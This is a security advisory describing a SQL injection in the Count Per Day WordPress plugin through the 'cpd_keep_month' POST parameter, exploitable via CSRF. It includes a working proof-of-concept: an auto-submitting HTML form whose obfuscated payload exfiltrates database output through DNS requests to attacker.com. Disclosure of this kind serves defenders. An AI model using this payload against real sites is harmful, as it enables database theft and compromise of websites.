SQL Injection in Count Per Day WordPress Plugin

High-Tech Bridge Security Research Lab discovered SQL Injection vulnerability in Count Per Day WordPress plugin, which can be exploited to execute arbitrary SQL queries in application’s database, gain control of potentially sensitive information and compromise the entire website.

The vulnerability is caused by insufficient filtration of input data passed via the “cpd_keep_month” HTTP POST parameter to “/wp-admin/options-general.php” script. A remote user with administrative privileges can manipulate SQL queries, inject and execute arbitrary SQL commands within the application’s database.
This vulnerability can be exploited by anonymous attacker via CSRF vector, since the web application does not check origin of HTTP requests.

The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for version() (or any other sensetive output from the database) subdomain of “.attacker.com” (a domain name, DNS server of which is controlled by the attacker):

<form action = “http://wordpress/wp-admin/options-general.php?page=count-per-day/counter-op tions.php&tab=tools” method = “POST” name=“f1”>
<input type=“hidden” name=“collect” value=“Collect old data”>
<input type=“hidden” name=“do” value=“cpd_collect”>
<input type=“hidden” name=“cpd_keep_month” value=“6 MONTH) AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) – 2”>
<input value="go type=“submit” />
</form><script>document.f1.submit();</script>